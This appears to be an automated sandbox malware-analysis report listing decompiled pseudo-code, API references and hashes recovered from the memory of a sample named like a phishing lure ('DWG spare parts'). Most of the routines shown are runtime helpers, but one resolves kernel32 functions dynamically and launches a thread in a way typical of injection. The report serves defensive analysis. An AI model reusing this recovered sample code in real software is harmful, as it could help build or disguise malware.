                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0251D479
                                                                  • Part of subcall function 0251D444: GetProcAddress.KERNEL32(00000000), ref: 0251D45D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                • API String ID: 1646373207-1918263038
                                                                • Opcode ID: 6a9ecd4c59beb93e45ca2e530ab7a57b21b82d84fc55fdbbaf64aacb01fd8157
                                                                • Instruction ID: 5ca0a67ec224d47f227cdb59978af64349f34345b4388b3fa193cdd635549488
                                                                • Opcode Fuzzy Hash: 6a9ecd4c59beb93e45ca2e530ab7a57b21b82d84fc55fdbbaf64aacb01fd8157
                                                                • Instruction Fuzzy Hash: A041F761A472056B72086F6DB4054BB77FAF6C4710360881AF4088B745EEF1FD96AE2E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02512EC8(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
                                                                				CHAR* _t23;
                                                                				CHAR* _t24;
                                                                				CHAR* _t29;
                                                                				CHAR* _t30;
                                                                				CHAR* _t31;
                                                                				CHAR* _t32;
                                                                				intOrPtr* _t33;
                                                                				void* _t34;
                                                                				void* _t35;
                                                                				intOrPtr _t36;
                                                                				CHAR** _t37;
                                                                
                                                                				_t33 = __edx;
                                                                				_t23 = __eax;
                                                                				L2:
                                                                				while(1) {
                                                                					if( *_t23 != 0 &&  *_t23 <= 0x20) {
                                                                						_t23 = CharNextA(_t23);
                                                                						continue;
                                                                					}
                                                                					if( *_t23 != 0x22 || _t23[1] != 0x22) {
                                                                						_t35 = 0;
                                                                						 *_t37 = _t23;
                                                                						while( *_t23 > 0x20) {
                                                                							if( *_t23 != 0x22) {
                                                                								_t29 = CharNextA(_t23);
                                                                								_t35 = _t35 + _t29 - _t23;
                                                                								_t23 = _t29;
                                                                								continue;
                                                                							}
                                                                							_t23 = CharNextA(_t23);
                                                                							while( *_t23 != 0 &&  *_t23 != 0x22) {
                                                                								_t32 = CharNextA(_t23);
                                                                								_t35 = _t35 + _t32 - _t23;
                                                                								_t23 = _t32;
                                                                							}
                                                                							if( *_t23 != 0) {
                                                                								_t23 = CharNextA(_t23);
                                                                							}
                                                                						}
                                                                						E02514F90(_t33, _t35);
                                                                						_t24 =  *_t37;
                                                                						_t36 =  *_t33;
                                                                						_t34 = 0;
                                                                						while( *_t24 > 0x20) {
                                                                							if( *_t24 != 0x22) {
                                                                								_t30 = CharNextA(_t24);
                                                                								if(_t30 <= _t24) {
                                                                									continue;
                                                                								} else {
                                                                									goto L27;
                                                                								}
                                                                								do {
                                                                									L27:
                                                                									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
                                                                									_t24 =  &(_t24[1]);
                                                                									_t34 = _t34 + 1;
                                                                								} while (_t30 > _t24);
                                                                								continue;
                                                                							}
                                                                							_t24 = CharNextA(_t24);
                                                                							while( *_t24 != 0 &&  *_t24 != 0x22) {
                                                                								_t31 = CharNextA(_t24);
                                                                								if(_t31 <= _t24) {
                                                                									continue;
                                                                								} else {
                                                                									goto L21;
                                                                								}
                                                                								do {
                                                                									L21:
                                                                									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
                                                                									_t24 =  &(_t24[1]);
                                                                									_t34 = _t34 + 1;
                                                                								} while (_t31 > _t24);
                                                                							}
                                                                							if( *_t24 != 0) {
                                                                								_t24 = CharNextA(_t24);
                                                                							}
                                                                						}
                                                                						return _t24;
                                                                					} else {
                                                                						_t23 =  &(_t23[2]);
                                                                						continue;
                                                                					}
                                                                				}
                                                                			}















                                                                APIs
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 02512F02
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F0C
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F2B
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 02512F35
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F61
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString), ref: 02512F6B
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString), ref: 02512F93
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F9D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID: $ $ $"$"$"$"$"$"
                                                                • API String ID: 3213498283-3597982963
                                                                • Opcode ID: 0273904c9f9a17f91be703fda1c9f69ed8930e9c670c125e91c15341f9f53dc5
                                                                • Instruction ID: cb6c9253d38261ef6a82ec268c4b0bf38bac2a8a9de48b51c809fe6197380553
                                                                • Opcode Fuzzy Hash: 0273904c9f9a17f91be703fda1c9f69ed8930e9c670c125e91c15341f9f53dc5
                                                                • Instruction Fuzzy Hash: 3E31A79560C3F12EFB322674DCC532ABEC5BB8F250F084DE59946CA247E7A84441C759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0252411C(void* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				long _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				_Unknown_base(*)()* _v28;
                                                                				_Unknown_base(*)()* _v32;
                                                                				char _v36;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				void* _t34;
                                                                				void* _t35;
                                                                				long _t42;
                                                                				intOrPtr _t43;
                                                                
                                                                				_t36 = __ecx;
                                                                				_v12 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t34 = __eax;
                                                                				_t43 = _a4;
                                                                				_t42 = 0;
                                                                				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetModuleHandleA");
                                                                				_v32 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetProcAddress");
                                                                				_v36 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "ExitThread");
                                                                				if(_t43 != 4) {
                                                                					_t36 = _t43;
                                                                					_v20 = E02523DAC(_t34, _t43, _v12);
                                                                				} else {
                                                                					_v20 = _v12;
                                                                				}
                                                                				_v24 = E02523D14(_t34, _t34, _t36, _v8, _t42, _t43);
                                                                				_t35 = E02523DDC(_t34,  &_v36, E025240EC, 0, 0x14);
                                                                				if(_t35 != 0) {
                                                                					WaitForSingleObject(_t35, 0xffffffff);
                                                                					GetExitCodeThread(_t35,  &_v16);
                                                                					_t42 = _v16;
                                                                				}
                                                                				return _t42;
                                                                			}




















                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 0252413C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02524142
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 02524154
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0252415A
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 0252416C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02524172
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 025241BF
                                                                • GetExitCodeThread.KERNEL32(00000000,0255D33C,00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 025241C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc$CodeExitObjectSingleThreadWait
                                                                • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32.dll
                                                                • API String ID: 3399263034-1503429014
                                                                • Opcode ID: 431f20104eb34f5a2257e90ff4217420a72857788358324adb3900ddeea7e9f9
                                                                • Instruction ID: 5e56ffe8bed209c2d06ad138d1e6bd246238ebf87499b541996d438a1f25ed88
                                                                • Opcode Fuzzy Hash: 431f20104eb34f5a2257e90ff4217420a72857788358324adb3900ddeea7e9f9
                                                                • Instruction Fuzzy Hash: 3F1166B0F0033A7BEB00ABA4CC409AEBBBDFF96310F110565A511B73C1D67499048FA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 98%
                                                                			E02512560(void* __eax, void* __fp0) {
                                                                				void* _v8;
                                                                				char _v110600;
                                                                				char _v112644;
                                                                				char _v112645;
                                                                				signed int _v112652;
                                                                				char _v112653;
                                                                				char _v112654;
                                                                				char _v112660;
                                                                				intOrPtr _v112664;
                                                                				intOrPtr _v112668;
                                                                				intOrPtr _v112672;
                                                                				struct HWND__* _v112676;
                                                                				signed short* _v112680;
                                                                				intOrPtr* _v112684;
                                                                				char _v129068;
                                                                				char _v131117;
                                                                				char _v161836;
                                                                				void* _v162091;
                                                                				signed char _v162092;
                                                                				void* _t73;
                                                                				int _t79;
                                                                				signed int _t126;
                                                                				int _t131;
                                                                				intOrPtr _t132;
                                                                				char* _t134;
                                                                				char* _t135;
                                                                				char* _t136;
                                                                				char* _t137;
                                                                				char* _t138;
                                                                				char* _t139;
                                                                				char* _t141;
                                                                				char* _t142;
                                                                				char* _t147;
                                                                				char* _t148;
                                                                				intOrPtr _t180;
                                                                				void* _t182;
                                                                				void* _t184;
                                                                				void* _t185;
                                                                				intOrPtr* _t188;
                                                                				intOrPtr* _t189;
                                                                				signed int _t194;
                                                                				void* _t197;
                                                                				void* _t198;
                                                                				void* _t211;
                                                                
                                                                				_push(__eax);
                                                                				_t73 = 0x27;
                                                                				goto L1;
                                                                				L12:
                                                                				while(_t180 != 0x256a700) {
                                                                					_t79 = E02512078(_t180);
                                                                					_t131 = _t79;
                                                                					__eflags = _t131;
                                                                					if(_t131 == 0) {
                                                                						L11:
                                                                						_t180 =  *((intOrPtr*)(_t180 + 4));
                                                                						continue;
                                                                					} else {
                                                                						goto L4;
                                                                					}
                                                                					do {
                                                                						L4:
                                                                						_t194 =  *(_t131 - 4);
                                                                						__eflags = _t194 & 0x00000001;
                                                                						if((_t194 & 0x00000001) == 0) {
                                                                							__eflags = _t194 & 0x00000004;
                                                                							if(__eflags == 0) {
                                                                								__eflags = _v112652 - 0x1000;
                                                                								if(_v112652 < 0x1000) {
                                                                									_v112664 = (_t194 & 0xfffffff0) - 4;
                                                                									_t126 = E025123BC(_t131);
                                                                									__eflags = _t126;
                                                                									if(_t126 == 0) {
                                                                										_v112645 = 0;
                                                                										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
                                                                										_t18 =  &_v112652;
                                                                										 *_t18 = _v112652 + 1;
                                                                										__eflags =  *_t18;
                                                                									}
                                                                								}
                                                                							} else {
                                                                								E02512414(_t131, __eflags, _t197);
                                                                							}
                                                                						}
                                                                						_t79 = E02512054(_t131);
                                                                						_t131 = _t79;
                                                                						__eflags = _t131;
                                                                					} while (_t131 != 0);
                                                                					goto L11;
                                                                				}
                                                                				_t132 =  *0x256c7a8; // 0x7ef90000
                                                                				while(_t132 != 0x256c7a4 && _v112652 < 0x1000) {
                                                                					_t79 = E025123BC(_t132 + 0x10);
                                                                					__eflags = _t79;
                                                                					if(_t79 == 0) {
                                                                						_v112645 = 0;
                                                                						_t22 = _t132 + 0xc; // 0x80004
                                                                						_t79 = _v112652;
                                                                						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
                                                                						_t27 =  &_v112652;
                                                                						 *_t27 = _v112652 + 1;
                                                                						__eflags =  *_t27;
                                                                					}
                                                                					_t29 = _t132 + 4; // 0x7f010000
                                                                					_t132 =  *_t29;
                                                                				}
                                                                				if(_v112645 != 0) {
                                                                					L48:
                                                                					return _t79;
                                                                				}
                                                                				_v112653 = 0;
                                                                				_v112668 = 0;
                                                                				_t134 = E02512210(0x28,  &_v161836);
                                                                				_v112660 = 0x37;
                                                                				_v112680 = 0x252d046;
                                                                				_v112684 =  &_v110600;
                                                                				do {
                                                                					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                                                                					_v112654 = 0;
                                                                					_t182 = 0xff;
                                                                					_t188 = _v112684;
                                                                					while(_t134 <=  &_v131117) {
                                                                						if( *_t188 > 0) {
                                                                							if(_v112653 == 0) {
                                                                								_t134 = E02512210(0x27, _t134);
                                                                								_v112653 = 1;
                                                                							}
                                                                							if(_v112654 != 0) {
                                                                								 *_t134 = 0x2c;
                                                                								_t139 = _t134 + 1;
                                                                								 *_t139 = 0x20;
                                                                								_t140 = _t139 + 1;
                                                                								__eflags = _t139 + 1;
                                                                							} else {
                                                                								 *_t134 = 0xd;
                                                                								 *((char*)(_t134 + 1)) = 0xa;
                                                                								_t147 = E025120F4(_v112668 + 1, _t134 + 2);
                                                                								 *_t147 = 0x20;
                                                                								_t148 = _t147 + 1;
                                                                								 *_t148 = 0x2d;
                                                                								 *((char*)(_t148 + 1)) = 0x20;
                                                                								_t140 = E02512210(8, E025120F4(_v112672, _t148 + 2));
                                                                								_v112654 = 1;
                                                                							}
                                                                							_t211 = _t182 - 1;
                                                                							if(_t211 < 0) {
                                                                								_t141 = E02512210(7, _t140);
                                                                							} else {
                                                                								if(_t211 == 0) {
                                                                									_t141 = E02512210(6, _t140);
                                                                								} else {
                                                                									E02513BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                                                                									_t141 = E02512210(_v162092 & 0x000000ff, _t140);
                                                                								}
                                                                							}
                                                                							 *_t141 = 0x20;
                                                                							_t142 = _t141 + 1;
                                                                							 *_t142 = 0x78;
                                                                							 *((char*)(_t142 + 1)) = 0x20;
                                                                							_t134 = E025120F4( *_t188, _t142 + 2);
                                                                						}
                                                                						_t182 = _t182 - 1;
                                                                						_t188 = _t188 - 8;
                                                                						if(_t182 != 0xffffffff) {
                                                                							continue;
                                                                						} else {
                                                                							goto L37;
                                                                						}
                                                                					}
                                                                					L37:
                                                                					_v112668 = _v112672;
                                                                					_v112684 = _v112684 + 0x800;
                                                                					_v112680 =  &(_v112680[0x10]);
                                                                					_t60 =  &_v112660;
                                                                					 *_t60 = _v112660 - 1;
                                                                				} while ( *_t60 != 0);
                                                                				if(_v112652 <= 0) {
                                                                					L47:
                                                                					E02512210(3, _t134);
                                                                					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                                                                					goto L48;
                                                                				}
                                                                				if(_v112653 != 0) {
                                                                					 *_t134 = 0xd;
                                                                					_t136 = _t134 + 1;
                                                                					 *_t136 = 0xa;
                                                                					_t137 = _t136 + 1;
                                                                					 *_t137 = 0xd;
                                                                					_t138 = _t137 + 1;
                                                                					 *_t138 = 0xa;
                                                                					_t134 = _t138 + 1;
                                                                				}
                                                                				_t134 = E02512210(0x3c, _t134);
                                                                				_t184 = _v112652 - 1;
                                                                				if(_t184 >= 0) {
                                                                					_t185 = _t184 + 1;
                                                                					_v112676 = 0;
                                                                					_t189 =  &_v129068;
                                                                					L43:
                                                                					L43:
                                                                					if(_v112676 != 0) {
                                                                						 *_t134 = 0x2c;
                                                                						_t135 = _t134 + 1;
                                                                						 *_t135 = 0x20;
                                                                						_t134 = _t135 + 1;
                                                                					}
                                                                					_t134 = E025120F4( *_t189, _t134);
                                                                					if(_t134 >  &_v131117) {
                                                                						goto L47;
                                                                					}
                                                                					_v112676 =  &(_v112676->i);
                                                                					_t189 = _t189 + 4;
                                                                					_t185 = _t185 - 1;
                                                                					if(_t185 != 0) {
                                                                						goto L43;
                                                                					}
                                                                				}
                                                                				L1:
                                                                				_t198 = _t198 + 0xfffff004;
                                                                				_push(_t73);
                                                                				_t73 = _t73 - 1;
                                                                				if(_t73 != 0) {
                                                                					goto L1;
                                                                				} else {
                                                                					E02513518( &_v112644, 0x1b800);
                                                                					E02513518( &_v129068, 0x4000);
                                                                					_t79 = 0;
                                                                					_v112652 = 0;
                                                                					_v112645 = 1;
                                                                					_t180 =  *0x256a704; // 0x2920000
                                                                					goto L12;
                                                                				}
                                                                			}















































                                                                0x025127b8
                                                                0x025127e2
                                                                0x025127ba
                                                                0x025127ef
                                                                0x02512808
                                                                0x02512808
                                                                0x025127b8
                                                                0x0251280a
                                                                0x0251280d
                                                                0x0251280e
                                                                0x02512812
                                                                0x0251281f
                                                                0x0251281f
                                                                0x02512821
                                                                0x02512822
                                                                0x02512828
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02512828
                                                                0x0251282e
                                                                0x02512834
                                                                0x0251283a
                                                                0x02512844
                                                                0x0251284b
                                                                0x0251284b
                                                                0x0251284b
                                                                0x0251285e
                                                                0x025128da
                                                                0x025128e6
                                                                0x025128fe
                                                                0x00000000
                                                                0x025128fe
                                                                0x02512867
                                                                0x02512869
                                                                0x0251286c
                                                                0x0251286d
                                                                0x02512870
                                                                0x02512871
                                                                0x02512874
                                                                0x02512875
                                                                0x02512878
                                                                0x02512878
                                                                0x0251288a
                                                                0x02512892
                                                                0x02512895
                                                                0x02512897
                                                                0x02512898
                                                                0x025128a2
                                                                0x00000000
                                                                0x025128a8
                                                                0x025128af
                                                                0x025128b1
                                                                0x025128b4
                                                                0x025128b5
                                                                0x025128b8
                                                                0x025128b8
                                                                0x025128c2
                                                                0x025128cc
                                                                0x00000000
                                                                0x00000000
                                                                0x025128ce
                                                                0x025128d4
                                                                0x025128d7
                                                                0x025128d8
                                                                0x00000000
                                                                0x00000000
                                                                0x025128d8
                                                                0x02512569
                                                                0x02512569
                                                                0x0251256f
                                                                0x02512570
                                                                0x02512571
                                                                0x00000000
                                                                0x02512573
                                                                0x0251258c
                                                                0x0251259e
                                                                0x025125a3
                                                                0x025125a5
                                                                0x025125ab
                                                                0x025125b2
                                                                0x00000000
                                                                0x025125b2

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                • API String ID: 2030045667-32948583
                                                                • Opcode ID: b0de788393eef4e35d9d779b73aca904dc55b2c3fa65bfe2821b564bdab05f47
                                                                • Instruction ID: 9ece151a485df265e3db3594c76b13b0f432830787bda24abd7e59ac5f95c48e
                                                                • Opcode Fuzzy Hash: b0de788393eef4e35d9d779b73aca904dc55b2c3fa65bfe2821b564bdab05f47
                                                                • Instruction Fuzzy Hash: 81A1D430A042B88BFF21AA2CC884BD9BAE5FB49710F1441E5DC49DB286DB7589C5CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 80%
                                                                			E02513154(void** __eax) {
                                                                				long _t29;
                                                                				void* _t31;
                                                                				long _t34;
                                                                				void* _t38;
                                                                				void* _t40;
                                                                				long _t41;
                                                                				int _t44;
                                                                				void* _t46;
                                                                				long _t54;
                                                                				long _t55;
                                                                				void* _t58;
                                                                				void** _t59;
                                                                				DWORD* _t60;
                                                                
                                                                				_t59 = __eax;
                                                                				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                				if(0xffffffffffff284f == 0) {
                                                                					_t29 = 0x80000000;
                                                                					_t55 = 1;
                                                                					_t54 = 3;
                                                                					 *((intOrPtr*)(__eax + 0x1c)) = 0x25130a8;
                                                                				} else {
                                                                					if(0xffffffffffff284f == 0) {
                                                                						_t29 = 0x40000000;
                                                                						_t55 = 1;
                                                                						_t54 = 2;
                                                                					} else {
                                                                						if(0xffffffffffff284f != 0) {
                                                                							return 0xffffffffffff284d;
                                                                						}
                                                                						_t29 = 0xc0000000;
                                                                						_t55 = 1;
                                                                						_t54 = 3;
                                                                					}
                                                                					_t59[7] = E025130E8;
                                                                				}
                                                                				_t59[9] = E02513134;
                                                                				_t59[8] = E025130E4;
                                                                				if(_t59[0x12] == 0) {
                                                                					_t59[2] = 0x80;
                                                                					_t59[9] = E025130E4;
                                                                					_t59[5] =  &(_t59[0x53]);
                                                                					if(_t59[1] == 0xd7b2) {
                                                                						if(_t59 != 0x256a3e0) {
                                                                							_t31 = GetStdHandle(0xfffffff5);
                                                                						} else {
                                                                							_t31 = GetStdHandle(0xfffffff4);
                                                                						}
                                                                					} else {
                                                                						_t31 = GetStdHandle(0xfffffff6);
                                                                					}
                                                                					if(_t31 == 0xffffffff) {
                                                                						goto L37;
                                                                					}
                                                                					 *_t59 = _t31;
                                                                					goto L30;
                                                                				} else {
                                                                					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                					if(_t38 == 0xffffffff) {
                                                                						L37:
                                                                						_t59[1] = 0xd7b0;
                                                                						return GetLastError();
                                                                					}
                                                                					 *_t59 = _t38;
                                                                					if(_t59[1] != 0xd7b3) {
                                                                						L30:
                                                                						if(_t59[1] == 0xd7b1) {
                                                                							L34:
                                                                							return 0;
                                                                						}
                                                                						_t34 = GetFileType( *_t59);
                                                                						if(_t34 == 0) {
                                                                							CloseHandle( *_t59);
                                                                							_t59[1] = 0xd7b0;
                                                                							return 0x69;
                                                                						}
                                                                						if(_t34 == 2) {
                                                                							_t59[8] = E025130E8;
                                                                						}
                                                                						goto L34;
                                                                					}
                                                                					_t59[1] = _t59[1] - 1;
                                                                					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                					if(_t40 == 0) {
                                                                						goto L37;
                                                                					}
                                                                					_t41 = _t40 - 0x81;
                                                                					if(_t41 < 0) {
                                                                						_t41 = 0;
                                                                					}
                                                                					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                						goto L37;
                                                                					} else {
                                                                						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                						_t58 = 0;
                                                                						if(_t44 != 1) {
                                                                							goto L37;
                                                                						}
                                                                						_t46 = 0;
                                                                						while(_t46 < _t58) {
                                                                							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                									goto L37;
                                                                								} else {
                                                                									goto L30;
                                                                								}
                                                                							}
                                                                							_t46 = _t46 + 1;
                                                                						}
                                                                						goto L30;
                                                                					}
                                                                				}
                                                                			}

















                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 025131DC
                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02513200
                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0251321C
                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0251323D
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02513266
                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02513274
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 025132AF
                                                                • GetFileType.KERNEL32(?,000000F5), ref: 025132C5
                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 025132E0
                                                                • GetLastError.KERNEL32(000000F5), ref: 025132F8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                • String ID:
                                                                • API String ID: 1694776339-0
                                                                • Opcode ID: fe27e3dc42b1b987ff18d1063b063a78db3cb5149674574a0aa667b0d1a18489
                                                                • Instruction ID: 890984a665a1ce467ff0600407490c90cdfb991ebe7bfc3cf6c14302f315b351
                                                                • Opcode Fuzzy Hash: fe27e3dc42b1b987ff18d1063b063a78db3cb5149674574a0aa667b0d1a18489
                                                                • Instruction Fuzzy Hash: F741F130240781BAFB34BF24C924B63B9E5FB41754F20CEA9D1BA865D4D765D444CB4C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 98%
                                                                			E0251255E(void* __eax) {
                                                                				void* _v8;
                                                                				char _v110600;
                                                                				char _v112644;
                                                                				char _v112645;
                                                                				signed int _v112652;
                                                                				char _v112653;
                                                                				char _v112654;
                                                                				char _v112660;
                                                                				intOrPtr _v112664;
                                                                				intOrPtr _v112668;
                                                                				intOrPtr _v112672;
                                                                				struct HWND__* _v112676;
                                                                				signed short* _v112680;
                                                                				intOrPtr* _v112684;
                                                                				char _v129068;
                                                                				char _v131117;
                                                                				char _v161836;
                                                                				void* _v162091;
                                                                				signed char _v162092;
                                                                				void* _t73;
                                                                				int _t79;
                                                                				signed int _t126;
                                                                				int _t131;
                                                                				intOrPtr _t132;
                                                                				char* _t134;
                                                                				char* _t135;
                                                                				char* _t136;
                                                                				char* _t137;
                                                                				char* _t138;
                                                                				char* _t139;
                                                                				char* _t141;
                                                                				char* _t142;
                                                                				char* _t147;
                                                                				char* _t148;
                                                                				intOrPtr _t180;
                                                                				void* _t182;
                                                                				void* _t184;
                                                                				void* _t185;
                                                                				intOrPtr* _t188;
                                                                				intOrPtr* _t189;
                                                                				signed int _t194;
                                                                				void* _t198;
                                                                				void* _t200;
                                                                				void* _t214;
                                                                
                                                                				_t198 = _t200;
                                                                				_push(__eax);
                                                                				_t73 = 0x27;
                                                                				goto L2;
                                                                				L13:
                                                                				while(_t180 != 0x256a700) {
                                                                					_t79 = E02512078(_t180);
                                                                					_t131 = _t79;
                                                                					__eflags = _t131;
                                                                					if(_t131 == 0) {
                                                                						L12:
                                                                						_t180 =  *((intOrPtr*)(_t180 + 4));
                                                                						continue;
                                                                					} else {
                                                                						goto L5;
                                                                					}
                                                                					do {
                                                                						L5:
                                                                						_t194 =  *(_t131 - 4);
